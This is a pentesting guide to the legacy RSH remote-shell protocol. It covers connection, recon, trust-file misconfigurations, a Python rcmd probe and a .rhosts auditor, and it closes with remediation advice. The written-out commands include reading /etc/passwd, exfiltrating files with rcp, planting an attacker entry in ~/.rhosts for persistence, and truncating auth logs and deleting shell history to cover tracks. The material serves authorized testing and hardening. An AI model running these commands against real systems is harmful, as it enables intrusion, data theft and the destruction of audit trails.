RSH Pentesting
Default Port: 514 (TCP)
RSH (Remote Shell) is a legacy BSD protocol, one of the r-commands (rsh, rlogin, rcp), that lets a user run shell commands on a remote machine. It authenticates by host trust (.rhosts and /etc/hosts.equiv) rather than by password, and everything, including command output, crosses the network in cleartext. In this article, we examine pentesting techniques for RSH under the following categories: Connect, Recon, Enumeration, Attack Vectors, and Post-Exploitation.
Connect
Connecting to an RSH Service
You connect with the rsh client. The minimal form takes the target host and a command:
rsh <remote-server-ip> <command>
If you omit the command, rsh does not talk to the RSH service at all: it hands over to rlogin, which uses port 513 and a separate login dialogue. Also note that rshd only accepts connections whose source port is in the reserved range (512-1023), which is why the rsh client is installed setuid root; run it as root or from a setuid copy, or the server will drop the connection.
Executing Commands
Each rsh invocation runs one shell command on the remote machine under the given account; there is no interactive session to keep open. The username goes before the host:
rsh -l <username> <remote-server-ip> <command>
For example:
rsh -l user 192.168.1.10 ls -la
This runs ls -la on 192.168.1.10 as the user account, provided that account's .rhosts (or /etc/hosts.equiv) trusts your host and client-side username. There is no password prompt: if the trust check fails, the server replies "Permission denied." The command is passed to the remote shell as a string, so pipes, redirections and quotes must be quoted on your side or your local shell will apply them to rsh itself. Putting -l after the host is not portable: implementations whose option parser permutes arguments would swallow the remote command's own -l flags.
Recon
Identifying an RSH Service
Use Nmap to check whether something listens on the RSH port of a host:
nmap -p 514 -sV X.X.X.X
Port 514/tcp is registered as "shell" (rshd); 514/udp is syslog, so scan TCP. -sV makes Nmap probe the service rather than report the port name from its table, which matters because rshd never announces itself.
Banner Grabbing
Netcat confirms the port accepts connections, but rshd has no banner to grab:
nc -nv X.X.X.X 514
After the TCP handshake the server sends nothing and waits for the client's request (four NUL-terminated fields: stderr port, client username, server username, command). Because rshd also checks that the connection comes from a reserved source port (512-1023), a plain nc session from an unprivileged user is closed immediately with no output. This step tells you only that the port is open; identification comes from nmap -sV or from speaking the protocol (as root, nc -p 1023 keeps the connection alive so you can send a request by hand).
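Since nc shows nothing, the quickest way to identify rshd is to speak its request format. The following is an added example (Python, not from the original page or from any tool it names): it frames the client request, parses the server's one-byte status reply, and includes a toy rshd that answers from a constructed trust table so the exchange can be run offline; probe() sends the same request to a real host on TCP 514 and needs root to bind a reserved source port. The hostnames, usernames and trust table are constructed for the example.

```python
#!/usr/bin/env python3
"""rcmd/rsh protocol probe (added example; not from the page or any tool it names).

rshd sends no banner.  The client speaks first, sending four NUL-terminated
fields: "<stderr port>\0<client user>\0<server user>\0<command>\0".  The server
answers with a single 0x00 byte (then command output) on success, or 0x01
followed by an error line such as "Permission denied.\n" on failure.  Before
reading anything it checks that the client's source port is reserved (512-1023).
"""
import socket

PRIV_PORT_LOW, PRIV_PORT_HIGH = 512, 1023   # source-port range rshd accepts
RSH_PORT = 514
CLIENT_HOST = "attacker.lab"                # constructed: reverse DNS name of our host


def build_rcmd_request(client_user, server_user, command, stderr_port=0):
    """Frame the client request.  stderr_port 0 tells rshd not to open the
    second (stderr) connection back to the client."""
    fields = (str(stderr_port), client_user, server_user, command)
    if any("\0" in f for f in fields):
        raise ValueError("NUL is the field terminator and cannot appear in a field")
    return "".join(f + "\0" for f in fields).encode()


def parse_rcmd_request(data):
    """Server-side view: recover the four fields from the raw request."""
    parts = data.split(b"\0")
    if len(parts) != 5 or parts[4] != b"":      # 4 fields, each NUL-terminated
        raise ValueError("malformed rcmd request")
    port, client_user, server_user, command = (p.decode() for p in parts[:4])
    return int(port), client_user, server_user, command


def parse_rcmd_response(data):
    """Classify what rshd sent back: ('ok', output), ('error', message),
    ('closed', '') when it dropped the connection, or ('unknown', raw)."""
    if not data:
        return "closed", ""
    if data[0] == 0:
        return "ok", data[1:].decode(errors="replace")
    if data[0] == 1:
        return "error", data[1:].decode(errors="replace").rstrip("\n")
    return "unknown", data.decode(errors="replace")


def fake_rshd(request, trusted, source_port):
    """Toy rshd for offline use.  'trusted' maps a server-side account to the
    set of (client host, client user) pairs from its ~/.rhosts.  Mirrors the
    real daemon's order of checks: reserved port first, then the trust lookup."""
    if not PRIV_PORT_LOW <= source_port <= PRIV_PORT_HIGH:
        return b""                                   # real rshd just exits here
    try:
        _, client_user, server_user, command = parse_rcmd_request(request)
    except ValueError:
        return b""
    if (CLIENT_HOST, client_user) not in trusted.get(server_user, set()):
        return b"\x01Permission denied.\n"
    # Success: status byte, then constructed output standing in for the command.
    return b"\x00" + f"[{server_user}] ran: {command}\n".encode()


def probe(host, client_user, server_user, command="id", timeout=5.0):
    """Send one request to a live rshd.  Binding a reserved source port needs
    root; without it the bind loop falls through and rshd will close on us."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    for port in range(PRIV_PORT_HIGH, PRIV_PORT_LOW - 1, -1):
        try:
            s.bind(("", port))
            break
        except OSError:
            continue
    chunks = []
    try:
        s.connect((host, RSH_PORT))
        s.sendall(build_rcmd_request(client_user, server_user, command))
        while True:
            chunk = s.recv(4096)
            if not chunk:
                break
            chunks.append(chunk)
    except socket.timeout:
        pass
    finally:
        s.close()
    return parse_rcmd_response(b"".join(chunks))


if __name__ == "__main__":
    # Offline demonstration against the toy daemon with a constructed trust table.
    trusted = {"user": {("attacker.lab", "attacker")}}
    for server_user, port in (("user", 1022), ("root", 1022), ("user", 40000)):
        req = build_rcmd_request("attacker", server_user, "id")
        print(server_user, port, parse_rcmd_response(fake_rshd(req, trusted, port)))
```

Against a live target, a "closed" result from an unprivileged run means only that the source-port check failed; rerun as root before concluding the service is not rshd. An "error" with "Permission denied." is positive identification: the daemon parsed the request and consulted its trust files.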
Enumeration
Collecting System Information
Once you have a trusted username, each rsh call runs one command, so enumeration is a series of one-liners. For example:
rsh -l <username> <remote-server-ip> uname -a
rsh -l <username> <remote-server-ip> cat /etc/passwd
These retrieve the kernel version and list the local accounts, each of which may have its own .rhosts worth reading. Quote any command containing shell metacharacters so they reach the remote shell instead of being interpreted by your local one.
Attack Vectors
Exploiting Weak Authentication
RSH has no password step. rshd accepts a command when the connection comes from a reserved source port and the pair (client hostname, client username) appears in /etc/hosts.equiv or in the target account's ~/.rhosts, where the hostname is whatever reverse DNS returns for the connecting address. The trust is therefore only as strong as DNS and the surrounding network: an attacker who controls the reverse lookup, or who can source traffic from a trusted host's address, inherits that host's access. Check which hosts are trusted and whether any of them are reachable or spoofable from your position.
Brute Force Attacks
Because there is no password, "brute force" against rsh means guessing which usernames are trusted from your host. Hydra's rsh module does exactly this: it takes a login list and has no password field to test, so a -P list would be ignored:
hydra -L /path/to/users.txt <target_ip> rsh
Each attempt asks rshd to run a command as that user; any reply other than "Permission denied." means the account trusts your host/username pair. Password guessing belongs to the companion rlogin service (port 513), for which hydra has a separate rlogin module. Run hydra as root: rshd only accepts connections from reserved source ports.
Exploiting Misconfigurations
Look for .rhosts files (in each home directory) and /etc/hosts.equiv entries that grant more trust than intended. The format is one entry per line, a hostname followed by an optional username, with + as a wildcard for either field. The worst case is:
+ +
in ~/.rhosts, which lets any user on any host run commands as that account with no authentication at all. A lone + in /etc/hosts.equiv trusts every host for every non-root user with the same username on both sides (hosts.equiv is never consulted for root; only /root/.rhosts is). Also check ownership and mode: rshd ignores a .rhosts that is not owned by the account (or root) or that is writable by group or others, so a world-writable .rhosts is not usable as-is, though it is a sign of careless administration worth reporting.
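As an added example serving both this section and the .rhosts entry under Persistent Access below (Python, not from the original page): a small auditor that parses the two trust files with the daemon's line rules, rates each entry, and applies the ownership and mode checks under which rshd ignores the file. The sample file contents, hostnames and usernames are constructed.

```python
#!/usr/bin/env python3
"""Audit ~/.rhosts and /etc/hosts.equiv entries (added example; not from the page).

Format per line: "<host> [<user>]", where "+" is a wildcard, "-host" denies,
and "+@group" names an NIS netgroup.  Lines starting with '#' are comments and
the first matching line wins.  rshd also refuses a .rhosts that is not a regular
file, is owned by someone other than the account or root, is group/world
writable, or has extra hard links, so ownership and mode are checked too.
"""
import stat

# Constructed sample files for the demonstration.
SAMPLE_RHOSTS = """# constructed sample ~/.rhosts for account 'user'
build.lab jenkins
+ +
-evil.lab
+@admins
"""
SAMPLE_EQUIV = "# constructed /etc/hosts.equiv\n+\nnfs.lab backup\n"


def parse_rhosts(text):
    """Yield (lineno, host, user) per entry; user is None when the field is absent."""
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        yield lineno, parts[0], (parts[1] if len(parts) > 1 else None)


def audit_entries(text, path):
    """Return findings as (severity, lineno, message).  The path decides whether
    the file is per-account (~/.rhosts) or system-wide (/etc/hosts.equiv), since
    the same 'host user' entry means different things in each."""
    is_equiv = path.endswith("hosts.equiv")
    findings = []
    for lineno, host, user in parse_rhosts(text):
        if host.startswith("-"):
            findings.append(("info", lineno,
                f"deny entry for {host[1:]}; effective only if it precedes a matching allow"))
        elif host == "+" and user == "+":
            findings.append(("critical", lineno,
                "'+ +': any user on any host may run commands as this account"))
        elif host == "+":
            who = "any user with a matching username" if is_equiv else "the same username"
            findings.append(("high", lineno, f"'+' host: {who} from any host is trusted"))
        elif user == "+":
            findings.append(("high", lineno,
                f"any user on {host} may run commands as this account"))
        elif host.startswith("+@"):
            findings.append(("medium", lineno,
                f"netgroup {host[2:]} trusted; membership is controlled by NIS, not this file"))
        elif is_equiv and user:
            findings.append(("high", lineno,
                f"{user}@{host} may log in as any non-root account on this system"))
        else:
            findings.append(("medium", lineno,
                f"host-based trust in {host}: whoever controls its address or reverse DNS inherits it"))
    return findings


def check_file_mode(st_mode, st_uid, st_nlink, owner_uid):
    """Apply the daemon's acceptance rules to stat() results.  Returns the
    reasons the file would be ignored; an empty list means rshd will honour it."""
    reasons = []
    if not stat.S_ISREG(st_mode):
        reasons.append("not a regular file")
    if st_uid not in (0, owner_uid):
        reasons.append("owned by neither the account nor root")
    if st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        reasons.append("writable by group or others")
    if st_nlink > 1:
        reasons.append("hard-linked elsewhere")
    return reasons


if __name__ == "__main__":
    for path, text in (("/home/user/.rhosts", SAMPLE_RHOSTS), ("/etc/hosts.equiv", SAMPLE_EQUIV)):
        print(path)
        for severity, lineno, msg in audit_entries(text, path):
            print(f"  line {lineno} [{severity}] {msg}")
    # Mode 0644 owned by uid 1000 is acceptable; 0666 is not.
    print(check_file_mode(0o100644, 1000, 1, 1000), check_file_mode(0o100666, 1000, 1, 1000))
```

To run it against a real host after gaining access, feed it the output of cat on each file plus the uid, mode and link count from stat; the mode check is the piece attackers and defenders both forget, because an entry you append to a .rhosts you just chmod'ed to 666 will be silently ignored.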
Post-Exploitation
Privilege Escalation
After gaining access, look for a path to a more privileged account. Two RSH-specific checks come first: other local accounts' .rhosts files (including /root/.rhosts) may already trust your current host and username, giving a lateral step with no exploit at all, and /etc/hosts.equiv may extend that trust to every non-root account. Then fall back to generic Unix checks such as SUID binaries:
rsh -l <username> <remote-server-ip> 'find / -perm -4000 -type f 2>/dev/null'
The quotes keep the 2>/dev/null redirection on the remote side. Unquoted, your local shell applies it to the rsh process instead; here the effect happens to be similar because rsh relays remote stderr into its own, but for a redirection that writes a file the difference matters. The result lists SUID binaries that may be exploitable for privilege escalation.
Data Exfiltration
Once you have access, you can copy files out with rcp (remote copy), which rides on the same rshd service and the same host-trust authentication, so no extra credentials are needed:
rcp <username>@<remote-server-ip>:<remote-file-path> <local-file-path>
Like rsh, rcp moves everything in cleartext; anyone on the path can read the copied data, which is worth noting in the report alongside the finding itself.
Persistent Access
To maintain access, either add your SSH key to ~/.ssh/authorized_keys on the target (if sshd is running there) or extend the account's .rhosts to trust your host. Run the append on the target, quoting it so the redirection happens there rather than on your own machine:
rsh -l <username> <remote-server-ip> 'echo "attacker-ip attacker-user" >> ~/.rhosts'
The first field is the host to trust, given as a hostname or a literal IP address (rshd compares it against the connecting address and its reverse-DNS name); the second is your client-side username. The file must remain owned by the account and must not be group- or world-writable, or rshd will ignore it entirely.
Covering Tracks
Be precise about what actually records your activity. rshd logs connections through syslog (auth facility), typically to /var/log/auth.log or /var/log/secure, and truncating that file needs root on the target; the truncation itself is a common alert, and on an authorized test log destruction is usually out of scope anyway. If it is in scope, quote the command so the redirection runs remotely:
rsh -l <username> <remote-server-ip> 'echo "" > /var/log/auth.log'
rsh -l <username> <remote-server-ip> 'rm -f ~/.bash_history'
Without the quotes, the > is interpreted by your local shell and truncates a file on your own machine while the target merely runs echo. Note also that history -c only clears the in-memory history of an interactive bash; commands sent over rsh run in a non-interactive shell that writes no history at all, so there is nothing to clear and the builtin has no lasting effect. Removing ~/.bash_history addresses history left by earlier interactive (rlogin or ssh) sessions instead.
This covers the main pentesting activities against RSH services. The underlying fixes are simple and belong in the report: disable rshd (and rlogind), remove every .rhosts and /etc/hosts.equiv entry, and replace the r-commands with SSH. Always operate within ethical and legal boundaries and with appropriate written authorization.